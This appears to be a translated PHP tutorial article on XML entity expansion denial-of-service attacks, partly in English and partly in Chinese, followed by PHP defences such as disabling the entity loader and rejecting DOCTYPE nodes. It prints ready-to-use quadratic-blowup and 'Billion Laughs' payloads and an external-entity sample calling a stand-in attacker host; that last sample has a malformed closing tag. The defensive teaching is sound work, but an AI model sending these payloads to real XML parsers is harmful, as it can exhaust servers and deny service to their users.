Home > Article > Backend Development > XML entity expansion attack code example sharing
XMl Entity Expansion (attack) is somewhat similar to XML Entity Expansion, but it mainly attempts to conduct a DOS attack by consuming the server environment of the target program. This attack is based on XML Entity Expansion, which is implemented by creating a custom entity definition in XML's DOCTYPE
. For example, this definition can generate an object in memory that is much larger than the original allowed size of XML. XML structure to allow this attack to exhaust the memory resources necessary for the normal and efficient operation of the network server. This attack method is also applicable to the XML serialization function module of HTML5, which currently cannot be recognized as HTML by the libxml2
extension package.
There are several ways to extend XML custom entities to achieve the desired effect of exhausting server resources.
Generic Entity Expansion Attack is also called "Quadratic Blowup Attack". When using this method, custom entities are defined is an extremely long string. When this entity is used extensively in a file, the entity is expanded on each call, producing an XML structure that significantly exceeds the RAM size required by the original XML.
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]> <results> <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result> <result>&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; Keep it going... &long;&long;&long;&long;&long;&long;&long;...</result> </results>
By balancing the size of the custom entity string with the number of entities used within the body of the document, you can create an XML document or string that scales to take up a predictable amount of RAM space on the server. By occupying server RAM with repeated requests like this, a successful denial of service attack can be launched. The disadvantage of this method is that since the memory consumption effect is based on simple multiplication, the initial XML document or string itself needs to be large enough.
General entity expansion attack requires a large enough XML input data volume, while the average input bytes of the recursive entity expansion attack can produce a more powerful attack effect. This attack method relies on XML parsing to parse, thereby completing the exponential growth of small entity sets. Through this exponential growth approach, a much smaller amount of input data than a generic entity expansion attack can actually grow extremely large. Therefore, it is very appropriate that this method is called "XML Bomb" or "Billion Laughs Attack".
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY x0 "BOOM!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!-- Add the remaining sequence from x4...x100 (or boom) --> <!ENTITY x99 "&x98;&x98;"> <!ENTITY boom "&x99;&x99;"> ]> <results> <result>Explode in 3...2...1...&boom;</result> </results>
The XML Bomb attack does not require large amounts of XML data input that may be limited by the program. The entity set grows exponentially like this, and the final expanded text size is 2 to the 100th power of the initial &x0
entity value. This is really a huge and destructive bomb!
Both conventional and recursive entity expansion attacks rely on entities defined locally in the XML document type definition, but attackers can also define external entities. This obviously requires the XML parser to be able to make remote HTTP requests like we encountered before when describing the XML External Entity Injection (XXE) attack. Denying such requests is a basic security measure for your XML parser. Therefore, measures to defend against XXE attacks also apply to such XML entity expansion attacks.
Although it can be defended through the above methods, remote entity extension attacks by causing the XML parser to issue a remote HTTP request to obtain the extended value of the referenced entity. The returned results will themselves define external entities that other XML parsers must make separate HTTP requests for. As a result, seemingly innocuous requests can quickly get out of control and tax the server's available resources. In this case, if the request itself includes a recursive expansion attack, the end result will be even worse.
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml"> ]> <results> <result>3..2..1...&cascade<result> </results>
The above attack methods may also lead to more roundabout DOS attacks. For example, remote requests are adjusted to target local programs or any other programs that share their server resources. This attack method may result in a self-destructive DOS attack, in which the XML parser's attempts to parse external entities may trigger countless requests to the local program and thus consume more server resources. This method is therefore used to amplify the impact of previously discussed attacks using XML External Entity Injection (XXE) attacks to complete DOS attacks.
The following general defense measures are inherited from our defense measures against ordinary XML external entity attacks (XXE). We should deny parsing of local files and remote HTTP requests by custom entities in XML, and can use the following function that can be globally applied to all extensions written in PHP or XML that use the libxml2
function internally.
libxml_disable_entity_loader(true);
诚然PHP以不按常理出牌著称,它并不使用常规的防御方式。常规的防御方式在文档类型声明中,使用XML的文档类型定义来完全拒绝通过自定义实体的定义。PHP也的确为防御功能定义了一个替代实体的LIBXML_NOENT
常量,以及 DOMDocument::$substituteEntities
公共属性,但是使用这两条定义的防御效果不甚明显。似乎我们只能这样将就解决问题,而没有任何更好的解决方案。
虽说没有更好的方案,libxml2
函数也确实内置了默认拒绝递归实体解析。要知道递归实体要是出了问题可是能让你的错误日志”咻”地一下跟点亮圣诞树一样全面飘红的。如此看来,好像也没必要特意针对递归实体使用一种特殊防御手段,尽管我们是得做点什么来防止万一libxml2
函数突然陷回解析递归实体的故障里去。
当下新型威胁主要来自Generic Entity Expansion 或者Quadratic Blowup Attack的粗暴攻击方式。此类攻击方式不需要调用远程或本地系统,也不需要实体递归。事实上,唯一的防御措施要么是不用XML,要么是清理过滤所有包含文档类型声明的XML。除非要求的文档类型声明接收于安全的可信源,否则最安全的做法就是不用XML了。比如,我们是由同行验证的HTTPS连接接受的。否则,既然PHP没给我们提供禁用文档类型定义的选项,那我们就只能自建逻辑了。假定你能调用 libxml_disable_entity_loader(TRUE)
,那么后续程序运行就是安全的了,因为实体扩展这一步已经被递延到被扩展影响的节点值可被再次访问的时候了(然而勾选TURE以后永远都访问不到了)。
$dom = new DOMDocument; $dom->loadXML($xml); foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { throw new \InvalidArgumentException( 'Invalid XML: Detected use of illegal DOCTYPE' ); } }
当然啦,在 libxml_disable_entity_loader
被设定为TRUE
的前提下,以上代码才能正常运行,设定后XML初始加载的时外部实体引用就不会被解析了。除非解析器自己有一套全面的针对如何进行实体解析的控制选项,否则XML解析器不依赖libxml2
函数进行解析时,恐怕这就是唯一的防御措施了。
如果你想使用SimpleXML函数,记得用the simplexml_import_dom()
函数来转换核验过的DOMDocument
项目。
原文地址:Injection Attacks
OneAPM for PHP 能够深入到所有 PHP 应用内部完成应用性能管理 能够深入到所有 PHP 应用内部完成应用性能管理和监控,包括代码级别性能问题的可见性、性能瓶颈的快速识别与追溯、真实用户体验监控、服务器监控和端到端的应用性能管理。想阅读更多技术文章,请访问 OneAPM 官方技术博客。
The above is the detailed content of XML entity expansion attack code example sharing. For more information, please follow other related articles on the PHP Chinese website!